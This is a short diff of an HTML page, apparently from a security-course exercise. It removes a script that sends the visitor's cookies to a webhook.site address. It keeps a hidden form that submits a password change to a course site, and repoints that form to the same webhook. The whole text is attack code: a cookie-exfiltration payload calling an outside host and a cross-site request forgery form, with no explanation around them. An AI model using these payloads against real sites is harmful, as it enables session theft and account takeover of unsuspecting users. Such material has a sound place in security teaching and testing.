--- a/index.html
+++ b/index.html
@@ -1,7 +1,4 @@
-<script>
-    fetch(`https://webhook.site/4aa2fda7-ec6c-4b07-903f-9f09e628ea22?a=${document.cookie}`)
-</script>
-<form action="https://cats.is-course.ru/settings" method="POST">
+<form action="https://webhook.site/4aa2fda7-ec6c-4b07-903f-9f09e628ea22" method="POST">
     <input name="password" value="345">
     <input name="confirm-password" value="345">
 </form>
